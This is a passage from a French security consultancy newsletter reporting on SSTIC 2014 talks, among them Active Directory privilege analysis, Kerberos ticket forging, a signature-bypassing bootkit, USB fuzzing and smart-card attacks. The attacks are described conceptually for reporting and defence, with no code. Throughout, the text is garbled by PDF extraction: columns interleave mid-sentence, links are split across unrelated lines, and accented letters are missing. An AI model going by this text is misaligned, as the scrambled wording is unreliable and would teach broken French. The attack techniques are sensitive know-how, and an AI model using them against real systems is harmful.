+HANS VAN DE LOOY : Fondateur de Madison Gurkha et


dEthical Hacker ;

+DAVE KENNEDY : President de TrustedSec et fondateur


de la DerbyCon ;

Cette confrence a t loccasion pour lui de prsenter les


+WINN SCHWARTAU: Fondateur de The Security Awarness
Company.
fonctionnalits de son Botnet. Celles-ci sont des plus clas-
siques : Ce dbat portait sur la problmatique de la surveillance de
masse. Il tait divis en deux quipes, la premire repr-
+Dni de service par surcharge rseau ; sentant la NSA et lautre reprsentant les hacktivistes lut-
tant contre ces outils.
+Dpt et rcupration de fichiers ; Plusieurs questions leur ont t poses afin de comprendre
+Excution de commandes ; les motivations de chacune des parties.

+Connexion asynchrone pour viter la dtection de


connexions persistantes ; Rfrences

+... +[1] https://www.hackinparis.com/

38
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Confrences scurit

SSTIC
par Julien MEYER,
Charles DAGOUAT, Stphane AVI et Antonin AUROY

Comme chaque anne, le SSTIC sest droul les 4, 5 et 6 Chemins de contrle en environnement Active Directory
juin Rennes, sur le campus universitaire de Beaulieu Sud. Emmanuel Gras et Lucas Bouillot (ANSSI)
XMCO a eu la chance dtre parmi les quelques 500 partici-
pants ayant russi acheter leur place durant les quelques
minutes o celles-ci taient disponibles. En effet, depuis
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/che-
maintenant plusieurs annes, lensemble des places dispo- mins_de_controle_active_directory/SSTIC2014-Slides-che-
nibles est coul en un temps record : gnralement moins mins_de_controle_active_directory-gras_bouillot.pdf
de 10 minutes. Cette anne na pas fait exception la rgle.
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/che-
> Jour 1 mins_de_controle_active_directory/SSTIC2014-Article-che-
mins_de_controle_active_directory-gras_bouillot.pdf
Confrence douverture
Travis Goodspeed
Aprs avoir prsent quelques rappels sur Active Directory,
Lucas Bouillot et Emmanuel Gras sont entrs dans le vif de
Ldition 2014 du SSTIC a t ouverte par Travis, qui a pr-
leur sujet : lanalyse des relations privilgies dfinies au
sent plusieurs preuves de concept issues du journal quil
sein dun AD. En effet, bien que les auditeurs se contentent
auto-publie avec plusieurs autres chercheurs : PoC||GTFO.
souvent dplucher la liste des comptes utilisateurs appar-
tenant au groupe Administrateurs de Domaine , il existe
Sortant tout juste du train, nous navons pas rellement
de nombreuses relations exotiques permettant un
pu assister cette prsentation ; la salle tant comble, es-
utilisateur lambda dobtenir un niveau de privilges qui-
calier compris, lorsque nous sommes arrivs. Malgr tout,
valent. Par exemple, quand un stagiaire est en mesure de
la conclusion semblait pertinente. Le chercheur a en effet
modifier les GPO excutes sur le poste des administrateurs
pouss les participants au SSTIC schanger des trucs et
de domaine, ce dernier se trouve alors en mesure dobtenir
astuces, comportements qui ne seraient selon lui pas assez
les privilges dadministration du domaine par rebond.
dvelopps au sein de la communaut, et qui pourtant se-
rait la meilleure des garanties en matire de transmission
Lucas et Emmanuel ont donc dvelopp une solution leur
des connaissances.
permettant de simplifier lanalyse des relations dfinies
dans les AD (ceux que lon peut trouver dans la vraie vie).
Les trois confrences qui ont suivi traitaient du contrle
Cette solution repose sur lanalyse du fichier NTDS.dit afin
daccs et de la gestion des privilges en environnement
de reprsenter les relations dfinies dans lAD en un graphe
Windows et plus particulirement de lanalyse des relations
orient. Cette technique permet didentifier en un clin doeil
privilgies en environnement Active Directory, ainsi que
les chemins permettant dobtenir les privilges dadminis-
du fonctionnement de limplmentation Microsoft de Ker-
tration du domaine.
beros.
39

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Cette prsentation, bien que trs thorique, a permis de Secrets dauthentification pisode II : Kerberos
mettre en avant un problme souvent ignor par les au- contre-attaque
diteurs. Aurlien Bordes

Analyse de la scurit dun Active Directory avec loutil


+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
BTA secrets_dauthentification_pisode_ii__kerberos_cont/SS-
Joffrey Czarny et Philippe Biondi (Airbus Group) TIC2014-Article-secrets_dauthentification_pisode_ii__ker-
beros_contre-attaque-bordes_1.pdf
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
BTA_Analyse_de_la_securite_Active_Directory/SSTIC2014-
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
Slides-BTA_Analyse_de_la_securite_Active_Directory-czar- secrets_dauthentification_pisode_ii__kerberos_cont/SS-
ny_biondi_1.pdf|fr|Audit dActive Directory avec BTA] TIC2014-Slides-secrets_dauthentification_pisode_ii__ker-
beros_contre-attaque-bordes.pdf
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/BTA_ La matine sest conclue avec une prsentation dAurlien
Analyse_de_la_securite_Active_Directory/SSTIC2014-Ar- Bordes sur le fonctionnement du mcanisme dauthentifi-
ticle-BTA_Analyse_de_la_securite_Active_Directory-czar- cation et de contrle daccs Kerberos en environnement
ny_biondi.pdf Active Directory.

Joffrey Czarny et Philippe Biondi ont ensuite prsent BTA, Aprs avoir dtaill le fonctionnement et les spcificits de
une implmentation Open-Source des concepts prsents Kerberos en environnement Active Directory (en particulier
par Lucas et Emmanuel. Bien que leur solution soit architec- les notions de ticket TGT et TGS, ainsi que la PAC), Aurlien a
ture diffremment, lobjectif recherch par BTA reste simi- prsent les problmatiques lies la compromission dun
laire : raliser un audit dun environnement Active Directory domaine AD.
afin didentifier les comptes disposant de privilges levs,
les comptes inutiliss, les utilisateurs qui ne se sont jamais En effet, lorsquun pirate est en mesure de rcuprer les
connects, ceux qui nont pas chang leur mot de passe empreintes NTLM associes certains comptes (typique-
ou encore les comptes disposant dun mot de passe faible. ment les comptes machines suffixs par un $ , le compte
krbtgt , ou encore les comptes de trust associs un
Loutil est dvelopp en Python et sappuie sur une base domaine AD) de lAD laide doutils tels que pwdump ,
MongoDB. Il permet dans un premier temps dimporter le il est en mesure de contourner le mcanisme de contrle
contenu dune base NTDS.DIT afin de lancer dans un second daccs offert par Kerberos.
temps un ensemble de minner permettant de raliser
des vrifications sur des points de configuration prcis, Concrtement, un pirate est en mesure de forger un ticket
et ainsi de raliser un audit complet dans un temps mai- (TGS) Kerberos valide lui permettant de se connecter sur un
tris. systme distant intgr au domaine et dobtenir les privi-
lges dadministration les plus levs sur ce dernier.
Lintrt principal de cet outil est la possibilit dtendre la
liste des vrifications ralises en dveloppant des min-
ner , et ainsi de capitaliser dans le temps sur les nouveaux
+ La compromission des secrets dun compte machine de
lAD permet davoir le contrle sur la machine associe.
problmes de configuration dcouverts.
+La compromission des secrets dauthentification du
compte krbtgt permet davoir le contrle sur toutes les
ressources du domaine.

+ La compromission dun domaine peut entrainer la com-


promission des domaines qui lapprouvent.

Aurlien a conclu sa prsentation par une dmo, accompa-


gne de recommandations abordant :

+ la prvention de la compromission de ces comptes sen-


sibles ;

+la dtection et la supervision des incidents lis lutili-


sation malveillante des informations compromises ;

+et enfin, la raction ce type dincidents.


40
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
SSTIC 2014

Analyse scurit des modems des terminaux mobiles How to play Hooker : Une solution danalyse automati-
Benoit Michau (ANSSI) se de markets Android
Dimitri Kirchner et Georges Bossert (AMOSSYS)
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/Ana-
lyse_securite_modems_mobiles/SSTIC2014-Slides-Ana-
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/how_
lyse_securite_modems_mobiles-michau.pdf to_play_hooker__une_solution_danalyse_automati/SS-
TIC2014-Slides-how_to_play_hooker__une_solution_dana-
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/Ana-
lyse_automatise_de_markets_android-kirchner_bossert.
pdf
lyse_securite_modems_mobiles/SSTIC2014-Article-Ana-
lyse_securite_modems_mobiles-michau.pdf + Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
En dbut daprs-midi, Benoit Michau est venu prsenter la how_to_play_hooker__une_solution_danalyse_automati/
dmarche quil a mise en oeuvre pour analyser la scurit SSTIC2014-Article-how_to_play_hooker__une_solution_
des modems 2G, 3G et LTE des terminaux mobiles. Celle-ci danalyse_automatise_de_markets_android-kirchner_bos-
a dbut par une tude des quipements et des protocoles sert.pdf
mis en oeuvre dans ce type de communications afin dtre
en mesure de construire une plateforme de test. Une fois La prsentation suivante a permis daborder un sujet moins
la plateforme assemble, le chercheur a prsent le type bas-niveau. En effet, Dimitri Kirchner a dtaill la concep-
de tests raliss sur les quipements (tests sur les syntaxes tion dun framework danalyse dapplications Android.
ainsi que sur les protocoles), ainsi que certaines failles d-
couvertes par ce biais : Lobjectif des auteurs est de monter une plateforme dana-
lyse automatique leur permettant de caractriser les ap-
+Indication de chiffrement du canal radio inexistante; plications proposes sur un Android Market, afin dtre
en mesure de raliser des tudes statistiques sur ces der-
+Corruption mmoire lors de lauthentification 3G ; nires, mais aussi dobserver les rsultats dtaills relatifs
une application donne. Ils se reposent pour cela sur les
+Connexion LTE sans contrle dintgrit - attachement
dun mobile un faux rseau LTE.
frameworks Androguard pour lanalyse statique et sur Subs-
trate pour lanalyse dynamique.

Les failles existent donc bien chez de nombreux fabricants Une surcouche base dElasticSearch et de Kibana a aussi
et diteurs. Nombreux les corrigent ; mais pas tous. t conue. Elle permet dinterroger la base dans laquelle
sont stocks tous les rsultats. Celle-ci permet par exemple
de visualiser simplement les permissions rellement utili-
Investigation numrique & terminaux Apple iOS - Ac- ses par les applications, les suites de chiffrements prf-
quisition de donnes stockes sur un systme ferm res des dveloppeurs ou de dtecter certaines anoma-
Mathieu Renard (ANSSI) lies comme les applications qui cherchent utiliser les
commandes iptables ou su , ou encore qui cherchent
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
accder des fichiers prsents ailleurs que dans leur /
data/ .
Mathieu_RENARD_-_Investigation_numerique_iOS/SS-
TIC2014-Article-Mathieu_RENARD_-_Investigation_nume-
rique_iOS-renard.pdf

Les protections mises en places par le constructeur, le


manque doutils disponibles et le systme ferm rendent
les analyses des terminaux iOS complexes. Lors dune in-
vestigation sur systme il faut pouvoir accder au systme
de fichiers pour mener lenqute... Parti de ce constat, lau-
teur nous explique comment il utilise des vulnrabilits
connues et utilises dans les jailbreaks pour accder aux
systmes du terminal.

41

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Catch Me If You Can - A Compilation Of Recent Anti-Ana- Prsentation courte : Analyse de scurit des box ADSL
lysis In Malware Eric Alata (CNRS, LAAS, INSA & Thales), Jean-Christophe
Marion Marschalek (CYPHORT) Courrege (CNRS, LAAS & INSA), Mohammed Kaaniche
(CNRS, LAAS & INSA), Vincent Nicomette (CNRS & LAAS),
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
Yann Bachy (CNRS & LAAS), Yves Deswarte (CNRS & Thales)

catch_me_if_you_can/SSTIC2014-Article-catch_me_if_
you_can-marschalek.pdf
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/ana-
lyse_de_securite_des_box_adsl/SSTIC2014-Article-ana-
Les techniques danti-debug sont monnaie courante pour lyse_de_securite_des_box_adsl-alata_courrege_kaaniche_
se protger des analystes ou ralentir les analyses. Cepen- nicomette_bachy_deswarte.pdf
dant, cela ne rend pas ces dernires impossibles, il suffit
de persvrer. Ainsi loratrice nous fait dcouvrir / redcou- Les chercheurs se sont penchs sur la scurit des box ADSL
vrir plusieurs techniques danti-debug et revient sur le cas en partant du constat que sur celles-ci, la surface dattaque
dun malware intressant car il utilisait un langage obsolte se composait de deux axes : le LAN et le WAN. Cependant,
(VB6). que se passe-t-il si lon se branche la place de notre FAI
avec notre propre DSLAM ?

Ils ont tudi cette attaque sur six box diffrentes afin
de dterminer comment les diffrents FAI dploient leurs
mises jour, lancent des services, administrent les box, etc.

Prsentation courte : La radio qui venait du froid


Alain Schneider (COGICEO)

+ Slide
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/la_ra-
Prsentation courte: Scurit des ordivisions
Frdric Basse (Thales)
dio_qui_venait_du_froid/SSTIC2014-Slides-la_radio_qui_
venait_du_froid-schneider.pdf
+ Slides

+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/la_ra-
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/secu-
rite_des_ordivisions/SSTIC2014-Slides-securite_des_ordivi-
sions-basse.pdf
dio_qui_venait_du_froid/SSTIC2014-Article-la_radio_qui_
venait_du_froid-schneider.pdf
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/secu-
Une blague un collgue ? Voil comment Alain Schnei- rite_des_ordivisions/SSTIC2014-Article-securite_des_ordi-
der a dbut son tude sur les puces NRF24L01... En effet, visions-basse.pdf
un jour, son collgue est venu au bureau avec un clavier
sans fil, du coup, celui-ci sest demand sil pouvait inter- Votre tl est-elle scurise ? Voici la question laquelle
cepter les touches tapes. Ainsi, lauteur nous a fait une Frdric Basse essayer de rpondre en analysant la scu-
comparaison technique et tarifaire du matriel dintercep- rit dune smartTv (ordivision) de la marque Philips. Cette
tion existant. Il a fini sa prsentation sur une dmonstration boite noire renferme un vrai systme Linux avec de vrais
dinterception dun clavier Microsoft qui chiffre les donnes paquets et des vraies vulnrabilits. Au cours de son ana-
avec XOR... lyse, il est revenu vers une faille dcouverte au sein de la
librairie libupnp en 2012.

42
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
SSTIC 2014

> Jour 2
Escalade de privilges dans une carte puce Java Card
Guillaume Bouffard (quipe Smart Secure Devices (SSD)),
Jean-Louis Lanet (Universit de Limoges)

+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/es-
calade_de_privilege_dans_une_carte_a_puce_java_c/SS-
TIC2014-Slides-escalade_de_privilege_dans_une_carte_a_
puce_java_card-bouffard_lanet.pdf

+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/es-
calade_de_privilege_dans_une_carte_a_puce_java_c/
SSTIC2014-Article-escalade_de_privilege_dans_une_
carte_a_puce_java_card-bouffard_lanet.pdf
Bootkit revisited
Les chercheurs de Limoges ont voulu mieux comprendre ce Samuel Chevet (Sogeti)

+
qui se passe dans ces petites botes noires. Aprs un rappel
sur le JavaCard, les cartes puces et les JVM, ces derniers Slides
ont rfrenc les attaques existantes sur ce type de techno- https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
logies. Puis ils ont expliqu comment excuter un Shellcode bootkit_revisited/SSTIC2014-Slides-bootkit_revisited-che-
sur les cartes et dmontr une nouvelle technique pour vet.pdf

+
excuter du code natif pour accder aux informations stoc-
kes dans les cartes puces. Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
bootkit_revisited/SSTIC2014-Article-bootkit_revisited-che-
Recherche de vulnrabilits dans les piles USB : ap- vet.pdf
proches et outils
Fernand Lone Sang (QuarksLAB), Jordan Bouyat (QuarksLAB) Quelques semaines aprs avoir t prsents la HITB
Amsterdam, Samuel Chevet, chercheur chez Sogeti ESEC,
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/re-
nous a parl de ses travaux sur les rootkits, et plus parti-
culirement les bootkits, qui infectent les ordinateurs lors
cherche_de_vulnrabilits_dans_les_piles_usb__appr/SS- du processus de dmarrage. Il sest plus particulirement
TIC2014-Slides-recherche_de_vulnrabilits_dans_les_piles_ intress aux systmes dexploitation Windows pour ar-
usb__approches_et_outils-lone-sang_bouyat.pdf chitecture 64 bits. En effet, ces derniers disposent dune
fonctionnalit leur permettant dempcher le chargement
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/re-
de drivers systme ne disposant pas dune signature cryp-
tographique valide.
cherche_de_vulnrabilits_dans_les_piles_usb__appr/SS-
TIC2014-Article-recherche_de_vulnrabilits_dans_les_piles_ Sa prsentation sest dcoupe en deux parties. La pre-
usb__approches_et_outils-lone-sang_bouyat_2.pdf mire a permis daborder chaque tape du dmarrage
dun ordinateur : depuis le chargement du BIOS jusquau
lancement du systme dexploitation. Il a notamment rap-
Du fuzzing sur USB, en veux-tu en voil... Aprs une ex- pel tous les mcanismes de protection mis en place pour
plication sur lUSB, les techniques existantes de fuzzing et empcher une altration du systme dexploitation. En ef-
les fuzzeurs existants, mais pas toujours adquats ; le cher- fet, en sattaquant un systme au cours de ces tapes de
cheur prsente son outil quil a dvelopp afin de masteri- dmarrage, un attaquant est en mesure de disposer des
ser le fuzzing des quipements qui acceptent de lUSB. Ce- privilges les plus levs, afin par exemple de modifier le
lui-ci, bas sur un Facedancer conu par Travis Goodspeed, comportement du systme dexploitation.
permet de jouer/rejouer des trames USB modifies avec un
systme de surveillance qui essaie de dtecter toute ano- La deuxime partie sest concentre sur le contournement
malie. de toutes ces protections de manire stable. Pour le cher-
43

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
cheur, cela signifie de ne pas utiliser de hook, doffset En effet, la surveillance de structures connues au sein de la
hardcod ou de recherche de pattern en mmoire au sein mmoire de lhyperviseur permettrait de reprer une ven-
du bootkit/rootkit ; et ce, afin dtre compatible avec len- tuelle compromission lors de modifications inhabituelles de
semble des versions de Windows. Il a prsent son propre ces structures.
bootkit baptis ReBoot. Celui-ci repose sur lutilisation de
diffrentes fonctionnalits offertes par les processeurs 64
bits telles que le mode V8086 ou encore lutilisation de La scurit des systmes mainframes
breakpoint matriel. Stphane Diacquenod (Volvo IT)

Le principal intrt de cette technique est sa compatibili-


t avec tous les systmes dexploitation Windows. ReBoot
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/la_se-
est galement fonctionnel sur un disque chiffr, car aucune curite_des_systemes_mainframes/SSTIC2014-Slides-la_se-
modification de code nest ralise. Une rapide dmons- curite_des_systemes_mainframes-diacquenod.pdf
tration a permis de montrer la capacit du bootkit mo-
difier le comportement du systme dexploitation afin de
permettre un attaquant ne disposant pas du mot de passe
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/la_se-
dun utilisateur daccder son compte. curite_des_systemes_mainframes/SSTIC2014-Article-la_
securite_des_systemes_mainframes-diacquenod.pdf

Tests dintgrit dhyperviseurs de machines virtuelles Stphane Diacquenod de chez Volvo IT dresse un tat des
distance et assists par le matriel lieux de la scurit des mainframes. Utilis dans de nom-
Benoit Morgan et ric Alata (LAAS-CNRS) breux secteurs (bancaire, assurance, industrie lourde et dis-
tribution), le systme mainframe repose sur un hyperviseur
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/tests_
de type 1 nomm PR/SM (pour Processor Resource / Sys-
tem Manager). Ce dernier assure un mcanisme de parti-
dintegrite_dhyperviseurs/SSTIC2014-Article-tests_dinte- tions logiques LPAR permettant de sparer diffrents en-
grite_dhyperviseurs-morgan_alata_nicomette.pdf vironnements, avec une tanchit certifie EAL5. Chaque
LPAR dispose de son propre systme dexploitation, parmi
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/tests_
z/OS, z/VSE, z/TPF, s/Linux et z/VM.

dintegrite_dhyperviseurs/SSTIC2014-Slides-tests_dinte- Par la suite, Stphane focalise sa prsentation sur les mca-


grite_dhyperviseurs-morgan_alata_nicomette.pdf nismes de scurit inhrents z/OS, et ce pour une raison
simple : ils reprsentent 70 80% des systmes mainframe.
Benoit Morgan et ric Alata, chercheurs au laboratoire On retrouve un jeu dinstructions privilgies (similaire au
LAAS-CNRS nous prsentent le projet SVC, pour Secure Vir- systme de rings en x86), une protection des pages
tual Cloud. Le principe ? Proposer un systme de virtualisa- mmoires base sur une table de droit - un programme
tion scuris permettant de dtecter une anomalie au sein utilisateur ne peut pas lire les pages systme par exemple
de lhyperviseur, comme une corruption mmoire. - mais galement une implmentation UNIX appele USS
Dans ce but, ils proposent une solution en deux parties : ou OMVS permettant le fonctionnement des applications
dans un premier temps, utiliser un hyperviseur minimaliste utilisant TCP/IP. Seulement voil, Stphane nous explique
et de confiance qui sert virtualiser la couche suprieure que les administrateurs mainframes ne sont pas des ad-
(un hyperviseur classique comme ESXi, KVM ou Xen par ministrateurs UNIX. Leur mconnaissance de ces systmes
exemple) ; dans un second temps, surveiller la mmoire peut engendrer de gros problmes de scurit.
de cet hyperviseur de confiance avec une carte PCI Express
ddie, relie une machine distante par une connexion
Ethernet ou USB.

Il voque ensuite les problmatiques de contrle daccs


(API SAF reposant sur une base RACF, autorisations, etc.),
de journalisation, ainsi que les outils daudits - quasiment
inexistants pour le mainframe.

Finalement, la question Quel niveau de scurit est ca-


44 pable dassurer le mainframe ? , on trouvera pour rponse
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
SSTIC 2014

a dpend . Comme pour beaucoup dautres systmes Cryptocoding


(Windows et Linux), cest lattention porte par les quipes Jean-Philippe Aumasson (Kudelski Security)
techniques et managriales la scurit (durcissement des
configurations, dploiement des correctifs, etc.) qui per-
mettra de rpondre plus prcisment cette question.
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/crpy-
tocoding/SSTIC2014-Slides-crpytocoding-aumasson.pdf

Prsentation courte : Reconnaissance rseau grande Dans le monde de la cryptographie applique, on rencontre
chelle : port scan is not dead deux populations : dune part les cryptologues, maitres
Fred Raynal et Adrien Guinet (Quarkslab) des mathmatiques et des algorithmes de chiffrement, et
dautre part, les dveloppeurs, artistes du code et savants
+ Slides
http://www.quarkslab.com/dl/14-sstic-ivy-talk.pdf
de lingnierie logicielle.

Le problme, comme nous lexplique Jean-Philippe Aumas-


+Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/port_
son de chez Kudelski Security, cest que lintersection de ces
deux ensembles est bien souvent nulle. En effet, un dve-
scan_is_not_dead/SSTIC2014-Article-port_scan_is_not_ loppeur implmentant un algorithme de chiffrement sex-
dead-guinet_raynal.pdf pose une mauvaise implmentation de lalgorithme tout
en proposant un code robuste, tandis quun cryptologue
+ Outils
https://github.com/quarkslab/nodescan|nodescan
implmentera correctement lalgorithme tout en risquant
de prsenter un code vulnrable.
https://github.com/quarkslab/libleeloo|libleeloo
Jean-Phillipe poursuit en abordant la problmatique de
Fred Raynal et Adrien Guinet de chez Quarkslab ont prsen- lopen source, en prenant pour exemple OpenSSL : qui dit
t leur scanner maison : Nodescan. Ce dernier a pour but de open source dit revue de code par les pairs, qui dit revue
rpondre la problmatique du scan de masse et prtend de code par les pairs dit scurit. Cest bon se dit-on,
outrepasser les limitations de scanners comme Masscan et quelquun a revu le code . Sauf quon le sait, ce quelquun
Zmap (ces derniers requirent une bande passante digne qui doit disposer de comptences particulires est rare. Pire
dun fournisseur daccs Internet et sont trs bruyants). encore, cette confiance que lopen source induit est dan-
gereuse, puisque cest open source, quelquun a revu le
code , ce quelquun ce nest pas nous, ce nest pas les
autres - qui se disent la mme chose - cest donc proba-
blement personne. Il appuie son discours par un exemple
criant : la faille Heartbleed.

Nodescan prsente quant lui de srieux atouts : scaling


et performances. Il peut en effet tre distribu sur plusieurs
serveurs, lespace des lments scanner tant alors rpar-
tis alatoirement entre les diffrents noeuds (la charge des
scans est rpartie sur lensemble des nuds). Il repose par
ailleurs sur la bibliothque de fonction C++ maison libleeloo
qui permet deffectuer la rpartition alatoire de millions
dadresses IPs avec des performances satisfaisantes (le
whitepaper indique une moyenne avoisinant les 7,5 mil-
lions dadresses par seconde).
45

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Buy it, use it, break it... fix it : Caml Crush, un proxy Martine monte un CERT
PKCS#11 filtrant Nicolas Bareil (Airbus Group)
Ryad Benadjila, Thomas Calderon et Marion Daubignard
(ANSSI) Dans les annes 80, Martine allait la ferme, la mer,
au zoo, au cirque, et apprenait faire la cuisine. En 2014,
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
Martine se met la page : elle monte un CERT. Cest sur ce
thme plein dhumour, dans un discours saupoudr dune
buy_it_use_it_break_it__fix_it__caml_crush_un_prox/ pointe de provocation, que Nicolas Bareil voque son re-
SSTIC2014-Slides-buy_it_use_it_break_it__fix_it__caml_ tour dexprience sur la cration dun CERT industriel au sein
crush_un_proxy_pkcs11_filtrant-benadjila_calderon_dau- dAirbus Group.
bignard.pdf
Dabord, cest quoi un CERT ? Computer Emergency Res-
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
ponse Team , nous rpond Martine. Bon, on nest pas plus
avancs, mais on sait que a parle de rponse incident.
buy_it_use_it_break_it__fix_it__caml_crush_un_prox/ Dailleurs, Martine a bien tent de demander ses cama-
SSTIC2014-Article-buy_it_use_it_break_it__fix_it__caml_ rades, mais les CERT cest un milieu ferm et le contact nest
crush_un_proxy_pkcs11_filtrant-benadjila_calderon_dau- visiblement pas ais tablir. Mais Martine elle ne sest pas
bignard.pdf dmonte, elle a retrouss ses manches et elle sest attele
la tche, toute seule, parce que cest sr que ce nest pas
Le standard PKCS#11, produit par RSA Labs, permet din- son chien Patapouf qui allait laider.
terfacer de faon standardise des terminaux implmen-
tant de la cryptographie (un lecteur de carte puce par Quand on parle de CERT, on parle donc dincidents. Et des
exemple) et les applications qui utilisent ces terminaux. Le incidents sur un SI comme celui dAirbus Groupe, il y en a.
standard prend la forme dune API : les applications font Beaucoup. Du coup, pour Martine, pas question de soccuper
appel aux fonctions de cette API et les vendeurs fournissent des faits divers, des chiens crass (mon pauvre Patapouf),
des bibliothques partages qui les implmentent. Le pro- un CERT a se concentre sur les gros incidents. Encore que,
blme, cest que cette API est vulnrable certains types les incidents il faut les dtecter, et en gnral ce nest pas le
dattaques, notamment les attaques Wrap and Decrypt SOC/NOC qui les dtecte, lalerte vient de lextrieur. Aprs,
qui permettent dextraire les cls secrtes prsentes au sein on observe : cest qui lattaquant ? Quest-ce quil cherche ?
dun terminal. En outre, cest un standard, on ne peut pas Dailleurs, lattaquant il est humain et ils sont plusieurs.
sen passer car il est massivement utilis. Martine le voit bien, des fois ils tapent des commandes b-
tement et font des fautes de frappes rptitions, et des
Cest dans loptique de palier ce type dattaques que fois, ils sont rapides, efficaces et comptents. En tous cas,
Ryad, Thomas et Marion prsentent Caml Crush, un proxy ils aiment bien les administrateurs, surtout ceux qui laissent
PKCS#11 filtrant crit en OCaml. Ce dernier vient se placer des fichiers Excel pleins de mots de passe.
entre lapplication et la bibliothque partage fournies par
le vendeur afin dintercepter les appels lAPI et rejeter Finalement, lincident est caractris, maintenant il faut
ceux qui sont malveillants. Ce proxy est dcoup en deux rpondre, et il faut que a aille vite. L, Martine met lem-
composants : un client, plac au ct de lapplication, et phase sur limportance de la communication : la rponse
un serveur, plac du ct du terminal afin de ne pas tre incident cest un travail dquipe sur lensemble du SI,
contournable. Finalement, les rgles de filtrage des appels mais pas seulement ; les responsables des diffrents ples
lAPI sont dfinies dynamiquement au sein de la configu- de lentreprise, les filiales et voire mme les sous-traitants
ration du proxy. doivent tre sensibiliss. Et dans ces cas l, le mot dordre,
cest diplomatie.

46
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
SSTIC 2014

Rumps Sbastien Lecomte prsent loutil FuzzWin, portage Win-


dows du fuzzer Fuzzgrind. Le portage a t effectu grce
Le SSTIC sans les Rumps ne serait pas le SSTIC - il y en avait PIN Tools et limplmentation dun langage intermdiaire
27 cette anne : pour le marquage des donnes.

+ Lets rump!
+ Tuto Miasm - Fabrice Desclaux
+ Cloud ISO 14001 - Take 2 - Arnaud Ebalard
+ Lets talk about SELKS - ric Leblond
+ Kerby@Parsifal - Thomas Calderon & Olivier Levillain
+ SSTICY - Pierre Bienaim
+ Jai cru voir un grosminet - P.-M. Ricordel & P. Capillon
+ Lobfuscation dont vous tes le hros - Serge Guelton
+ Mind your languages - Pierre Chifflier
+Scurit des ADSL... ailleurs - Nicolas Ruff
+
+
Private
From
meeting
NAND till
Aurlien ?
dump - Jean-Yves Burlett
+ x86 anti-decoders (PoC) - Axel Tillequin
+ Stopper lattaque DDos de Bryan... - Gatan Duchaussois
+ jpg or mov, pourquoi choisir? - Christophe Grenier
+ TCP Fast Open - Renaud Dubouguais
+ Rebus - Philippe Biondi Prsentation courte : RpcView : un outil dexploration et
+ BNew - Outil de classification de malwares - ? de dcompilation des MS RPC
+ La rsolution du fameux challenge web100 - said & flux Jean-Marie Borello & Jrmy Boutard & Julien Boutet &
+ IRMA - Alexandre Quint Yoanne Girardin
+ Android 0dayz hunting, again - Fabien Perigaud
+ Les actes SSTIC en ebook - Yves-Alexis Perez http://www.rpcview.org/
+ Raadio sur canap - Jean-Philippe Gaulier
+ Nodescan - Adrien Guinet Prsentation de loutil RPCView, permettant danalyser et
+ Promo : No Such Con - ? de rejouer les MS-RPC, prsent un peu partout, mais non
+ Do not make your own crypto - Guillaume Delugr document par Microsoft. La prsentation a t suivie par
+ A Large Scale Analysis of the Security of Embedded Fir-
mwares - Aurlien Francillon
une dmo montrant lanalyse dun serveur Stuxnet afin de
forcer les clients se dsinstaller.

Dsobfuscation de DRM par attaques auxiliaires


> Jour 3 Camille Mougey & Francis Gabriel (QUARKSLAB)

laboration dune reprsentation intermdiaire pour


lexcution concolique et le marquage de donnes sous
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
Windows dsobfuscation_de_drm_par_attaques_auxiliaires/SS-
Sbastien Lecomte TIC2014-Slides-dsobfuscation_de_drm_par_attaques_auxi-
liaires-mougey_gabriel.pdf
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
representation_intermediaire_de_code_windows/SS-
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/
TIC2014-Slides-representation_intermediaire_de_code_ dsobfuscation_de_drm_par_attaques_auxiliaires/SS-
windows-lecomte.pdf TIC2014-Article-dsobfuscation_de_drm_par_attaques_au-
xiliaires-mougey_gabriel.pdf
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/repre- Lquipe de QuarksLab nous a galement prsent, en ce
